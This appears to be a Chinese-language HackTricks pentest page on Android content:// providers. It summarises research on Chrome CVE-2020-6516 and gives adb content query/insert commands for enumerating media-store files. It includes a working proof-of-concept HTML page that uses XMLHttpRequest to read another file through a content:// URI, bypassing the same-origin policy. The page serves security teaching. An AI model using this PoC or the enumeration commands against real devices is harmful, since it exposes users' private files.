content:// protocol

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS Red Team Expert）！

其他支持HackTricks的方式：

如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks，请查看订阅计划!
获取官方PEASS & HackTricks周边产品
探索PEASS家族，我们独家的NFTs
加入 💬 Discord群 或 电报群 或在Twitter上关注我们 🐦 @carlospolopm。
通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。

这是一篇文章的摘要 https://census-labs.com/news/2021/04/14/whatsapp-mitd-remote-exploitation-CVE-2021-24027/

在媒体存储中列出文件

要列出媒体存储管理的文件，可以使用以下命令：

$ content query --uri content://media/external/file

为了获得更加人性化的输出，仅显示每个索引文件的标识符和路径：

$ content query --uri content://media/external/file --projection _id,_data

内容提供程序

内容提供程序被隔离在它们自己的私有命名空间中。访问提供程序需要特定的 content:// URI。关于访问提供程序的路径信息可以从应用清单或Android框架的源代码中获取。

Chrome 访问内容提供程序

在 Android 上，Chrome 可以通过 content:// 方案访问内容提供程序，从而可以访问第三方应用程序导出的照片或文档等资源。为了说明这一点，可以将文件插入到媒体存储中，然后通过 Chrome 访问：

向媒体存储插入自定义条目：

cd /sdcard
echo "Hello, world!" > test.txt
content insert --uri content://media/external/file \
--bind _data:s:/storage/emulated/0/test.txt \
--bind mime_type:s:text/plain

发现新插入文件的标识符：

content query --uri content://media/external/file \
--projection _id,_data | grep test.txt
# Output: Row: 283 _id=747, _data=/storage/emulated/0/test.txt

文件可以使用使用文件标识符构建的URL在Chrome中查看。

例如，要列出与特定应用程序相关的文件：

content query --uri content://media/external/file --projection _id,_data | grep -i <app_name>

Chrome CVE-2020-6516: 同源策略绕过

Same Origin Policy (SOP) 是浏览器中的一种安全协议，它限制了网页与不同来源的资源进行交互，除非经过跨源资源共享 (CORS) 策略明确允许。该策略旨在防止信息泄露和跨站请求伪造。Chrome 将 content:// 视为本地方案，意味着更严格的 SOP 规则，其中每个本地方案 URL 都被视为一个单独的来源。

然而，CVE-2020-6516 是 Chrome 中的一个漏洞，允许通过 content:// URL 加载的资源绕过 SOP 规则。实际上，来自 content:// URL 的 JavaScript 代码可以访问通过 content:// URL 加载的其他资源，这是一个重要的安全问题，特别是在运行早于 Android 10 版本的 Android 设备上，因为这些设备尚未实现作用域存储。

下面的概念验证演示了这个漏洞，其中一个 HTML 文档在 /sdcard 下上传并添加到媒体存储后，使用其 JavaScript 中的 XMLHttpRequest 访问并显示媒体存储中另一个文件的内容，绕过了 SOP 规则。

概念验证 HTML:

<html>
<head>
<title>PoC</title>
<script type="text/javascript">
function poc()
{
var xhr = new XMLHttpRequest();

xhr.onreadystatechange = function()
{
if(this.readyState == 4)
{
if(this.status == 200 || this.status == 0)
{
alert(xhr.response);
}
}
}

xhr.open("GET", "content://media/external/file/747");
xhr.send();
}
</script>
</head>
<body onload="poc()"></body>
</html>

Websec | Uw Cybersecurity Specialist

从零开始学习AWS黑客技术，成为专家 htARTE（HackTricks AWS Red Team Expert）！

支持HackTricks的其他方式：

如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks，请查看订阅计划!
获取官方PEASS & HackTricks周边产品
发现PEASS家族，我们的独家NFTs
加入 💬 Discord群 或 电报群 或关注我们的Twitter 🐦 @carlospolopm。
通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。

上一页Bypass Biometric Authentication (Android)下一页Drozer Tutorial

最后更新于6天前